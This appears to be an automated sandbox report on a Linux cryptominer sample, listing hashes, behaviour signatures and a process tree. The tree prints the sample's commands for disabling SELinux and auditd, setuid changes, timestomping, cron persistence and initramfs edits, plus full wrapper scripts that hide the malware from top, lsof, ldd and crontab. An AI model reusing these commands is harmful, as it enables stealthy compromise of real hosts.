Analysis
-
max time kernel
27s -
max time network
149s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
-
submitted
08-10-2024 14:14
General
-
Target
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
-
Size
8.9MB
-
MD5
656e22c65bf7c04d87b5afbe52b8d800
-
SHA1
0fd199053171fec86be186106eac717c4edae2ad
-
SHA256
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
-
SHA512
697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183
-
SSDEEP
196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
-
XMRig Miner payload 1 IoCs
-
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Indicator Removal: Clear Command History 1 TTPs 1 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Checks hardware identifiers (DMI) 1 TTPs 6 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 4 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Disables SELinux 1 TTPs 3 IoCs
Disables SELinux security module.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies special file permissions 1 TTPs 6 IoCs
Adds special setuid and/ or setgid bits on a file, possibly to elevate privileges.
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads hardware information 1 TTPs 19 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Reads list of loaded kernel modules 1 TTPs 3 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
-
Writes file to system bin folder 6 IoCs
-
Indicator Removal: Timestomp 1 TTPs 11 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 7 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Command and Scripting Interpreter: Unix Shell 1 TTPs 44 IoCs
Execute scripts via Unix Shell.
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to shm directory 31 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes
-
/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c131⤵
- Reads list of loaded kernel modules
- Checks CPU configuration
- Writes file to tmp directory
-
/usr/bin/getconfgetconf CLK_TCK2⤵
-
/usr/bin/getconfgetconf PAGESIZE2⤵
-
/bin/sh/bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 >/dev/null 2>/dev/null & exit"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/nohupnohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c133⤵
-
/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c131⤵
- Deletes itself
- Reads list of loaded kernel modules
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/usr/bin/getconfgetconf CLK_TCK2⤵
-
/usr/bin/getconfgetconf PAGESIZE2⤵
-
/bin/sh/bin/sh -c "cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor && chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor"2⤵
- File and Directory Permissions Modification
-
/usr/bin/cpcp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor3⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor3⤵
- File and Directory Permissions Modification
-
/bin/sh/bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;gvfs-mtp-volume-monitor -k &"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/tmp/.perf.c/gvfs-mtp-volume-monitorgvfs-mtp-volume-monitor -k1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Creates/modifies Cron job
- Creates/modifies environment variables
- Enumerates active TCP sockets
- Modifies systemd
- Reads hardware information
- Reads list of loaded kernel modules
- Writes file to system bin folder
- Modifies Bash startup script
- Checks CPU configuration
- Reads system network configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to shm directory
- Writes file to tmp directory
-
/usr/bin/getconfgetconf CLK_TCK2⤵
-
/usr/bin/getconfgetconf PAGESIZE2⤵
-
/bin/sh/bin/sh -c "auditctl -e0"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/auditctlauditctl -e03⤵
-
/bin/sh/bin/sh -c "echo 0 > /sys/fs/selinux/enforce"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/bin/sh/bin/sh -c "setenforce 0"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/setenforcesetenforce 03⤵
- Disables SELinux
-
/bin/sh/bin/sh -c "if grep -q '^SELINUX=' /etc/selinux/config;then sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config;fi"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/grepgrep -q "^SELINUX=" /etc/selinux/config3⤵
-
/usr/bin/sedsed -i "s/^SELINUX=.*/SELINUX=disabled/" /etc/selinux/config3⤵
-
/bin/sh/bin/sh -c "if systemctl status auditd|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl status auditd3⤵
-
/usr/bin/grepgrep -q "enabled;"3⤵
-
/usr/bin/systemctlsystemctl stop auditd3⤵
- Indicator Removal: Clear Command History
-
/usr/bin/systemctlsystemctl disable auditd3⤵
- Changes its process name
-
/usr/bin/getoptgetopt -o r: --long root: -- disable auditd4⤵
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d auditd defaults4⤵
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵
-
/tmp/systemctlsystemctl daemon-reload5⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d auditd disable4⤵
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵
-
/tmp/systemctlsystemctl daemon-reload5⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/bin/sh/bin/sh -c "chmod 4755 /bin/wizlmsh"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod 4755 /bin/wizlmsh3⤵
- File and Directory Permissions Modification
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"2⤵
- Indicator Removal: Timestomp
-
/usr/bin/touchtouch -acmr /bin/sh /bin/wizlmsh3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
-
/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
-
/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
-
/usr/bin/touchtouch -acmr /bin/sh /bin/perfcc3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "(crontab -l|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')|crontab -"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
/usr/bin/crontabcrontab -l3⤵
-
/usr/bin/grepgrep -v -e perfcc -e /tmp/.perf3⤵
-
/bin/sh/bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"2⤵
- Indicator Removal: Timestomp
-
/usr/bin/sedsed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile3⤵
-
/usr/bin/touchtouch -acmr /bin/sh /root/.profile3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"2⤵
- File and Directory Permissions Modification
-
/usr/bin/cpcp /proc/2500/exe /lib/libpprocps.so3⤵
-
/usr/bin/chmodchmod +x /lib/libpprocps.so3⤵
- File and Directory Permissions Modification
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"2⤵
- File and Directory Permissions Modification
-
/usr/bin/cpcp /proc/2500/exe /lib/libfsnldev.so3⤵
-
/usr/bin/chmodchmod +x /lib/libfsnldev.so3⤵
- File and Directory Permissions Modification
-
/bin/.local/bin/top/bin/.local/bin/top2⤵
-
/bin/bash/bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"\$@\"" /bin/.local/bin/top2⤵
-
/bin/.local/bin/top/bin/.local/bin/top2⤵
-
/bin/bash/bin/.local/bin/top -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='top' m='perfctl' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap 'rm -rf /tmp/smpr &>/dev/null' EXIT trap 'rm -rf /tmp/smpr &>/dev/null' SIGINT touch /tmp/smpr &>/dev/null export AAZHDE=1 pkill -9 \$m &>/dev/null killall -9 \$m &>/dev/null ps -ax|grep \$m|grep -v grep|awk '{print \$1}'|xargs kill -9 &>/dev/null ps -ax|grep \$m|grep -vq grep || rm -rf /tmp/.apid &>/dev/null unset AAZHDE \$r \$@ fi " /bin/.local/bin/top2⤵
-
/usr/bin/envenv3⤵
-
/usr/bin/grepgrep -q ABWTRX3⤵
-
/bin/.local/bin/crontab/bin/.local/bin/crontab2⤵
-
/bin/bash/bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"\$@\"" /bin/.local/bin/crontab2⤵
-
/bin/.local/bin/crontab/bin/.local/bin/crontab2⤵
-
/bin/bash/bin/.local/bin/crontab -c " #!/bin/bash function rcrj(){ (\$r -l|grep -v -e perfcc -e /tmp/.perf;echo \"11 * * * * \$ap\")|\$r - } if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='crontab' a='perfcc' ap=\"\$HOME/.config/cron/perfcc\" p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap rcrj EXIT \$r -l|grep -Fv -e \$a -e /tmp/.perf|\$r - \$r \$@ fi " /bin/.local/bin/crontab2⤵
-
/usr/bin/grepgrep -q ABWTRX3⤵
-
/usr/bin/envenv3⤵
-
/bin/.local/bin/ldd/bin/.local/bin/ldd2⤵
-
/bin/bash/bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"\$@\"" /bin/.local/bin/ldd2⤵
-
/bin/.local/bin/ldd/bin/.local/bin/ldd2⤵
-
/bin/bash/bin/.local/bin/ldd -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='ldd' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -v gcwrap fi " /bin/.local/bin/ldd2⤵
-
/usr/bin/envenv3⤵
-
/usr/bin/grepgrep -q ABWTRX3⤵
-
/bin/.local/bin/lsof/bin/.local/bin/lsof2⤵
-
/bin/bash/bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"\$@\"" /bin/.local/bin/lsof2⤵
-
/bin/.local/bin/lsof/bin/.local/bin/lsof2⤵
-
/bin/bash/bin/.local/bin/lsof -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /bin/.local/bin/lsof2⤵
-
/usr/bin/envenv3⤵
-
/usr/bin/grepgrep -q ABWTRX3⤵
-
/bin/sh/bin/sh -c "chmod 755 /bin/.local/bin/*;touch -acmr /etc/passwd /bin/.local/bin/*"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod 755 /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top3⤵
- File and Directory Permissions Modification
-
/usr/bin/touchtouch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top3⤵
- Indicator Removal: Timestomp
-
/bin/sh/bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"2⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
-
/usr/bin/touchtouch /tmp/lgcdm /tmp/d.xdiag-03⤵
- Disables SELinux
- Writes file to tmp directory
-
/usr/bin/lsls -la /tmp3⤵
-
/usr/bin/rmrm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so3⤵
-
/bin/sh/bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1'"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/shsh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1"3⤵
- Writes file to tmp directory
-
/usr/bin/catcat4⤵
-
/bin/sh/bin/sh -c "chmod g+s /lib/libgcwrap.so"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/chmodchmod g+s /lib/libgcwrap.so3⤵
- Modifies special file permissions
-
/bin/sh/bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/findfind /usr/share/initramfs-tools/hooks -type f3⤵
-
/usr/bin/xargsxargs grep -s -l "ldd "3⤵
-
/tmp/.perf.c/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/tmp/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/local/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/local/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/bin/xargsxargs grep -L "export PATH=.*/\\.local/bin:.PATH"3⤵
-
/tmp/.perf.c/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/tmp/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/local/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/local/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/bin/sedsed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/dhcpcd3⤵
-
/usr/bin/sedsed -i "/^#!\\//a export PATH=/bin/.local/bin:\$PATH" /usr/share/initramfs-tools/hooks/cryptroot3⤵
-
/bin/sh/bin/sh -c "systemctl --type=service --state=running|grep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald|awk '{print \$1}'|xargs -I{} systemctl try-restart {} >/dev/null 2>/dev/null"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl "--type=service" "--state=running"3⤵
-
/usr/bin/grepgrep -F -e cron.service -e crond.service -e unattended-upgrades.service -e nginx.service -e apache2.service -e httpd.service -e ssh.service -e sshd.service -e postfix.service -e dovecot.service -e mariadb.service -e mysql.service -e mysqld.service -e systemd-journald3⤵
-
/usr/bin/awkawk "{print \$1}"3⤵
-
/usr/bin/xargsxargs "-I{}" systemctl try-restart "{}"3⤵
-
/tmp/.perf.c/systemctlsystemctl try-restart cron.service4⤵
-
/tmp/systemctlsystemctl try-restart cron.service4⤵
-
/usr/local/sbin/systemctlsystemctl try-restart cron.service4⤵
-
/usr/local/bin/systemctlsystemctl try-restart cron.service4⤵
-
/usr/sbin/systemctlsystemctl try-restart cron.service4⤵
-
/usr/bin/systemctlsystemctl try-restart cron.service4⤵
-
